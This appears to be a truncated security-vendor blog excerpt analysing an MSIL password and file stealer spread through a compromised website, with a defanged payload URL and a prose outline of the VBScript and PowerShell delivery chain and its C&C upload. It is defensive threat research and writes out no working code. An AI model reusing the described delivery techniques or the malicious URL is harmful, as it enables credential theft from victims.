Infostealer spreading through a compromised website

The Zscaler ThreatLabZ team has uncovered a new password stealer malware variant being delivered through a compromised website. The payload is Microsoft Intermediate Language (MSIL) compiled and steals the passwords from victims' system, browser, and FTP software. The payload analyzed in this blog was served from the compromised website dnoymuzikcom/wp-content/test/conhostexe.  Delivery vector The delivery method for this malware is the VBScript, which downloads the payload from the compromised website, and then downloads a decoy document to lead the victim to believe that the downloaded files are legitimate. Activities performed by VBScript file are as follows: Downloads decoy document Terminate Microsoft Word process Downloads payload through a PowerShell command Removes the document recovery entries of Microsoft Word through registry entries   Figure 1: Screen capture of VBScript activity Figure 2: Screen capture decoy document The decoy document poses as a "public service" message from a government organization and includes spam mitigation instructions.  Once the malware is executed, it performs various password stealing activities, such as checking for antivirus and looking into the directories and files from which it will steal information. The most interesting function of this malware is that it also behaves like a file stealer, as it checks for interesting strings in the system with enumeration of various files and folders and uploads to the malware's C&C once it grabs the sensitive...
Read more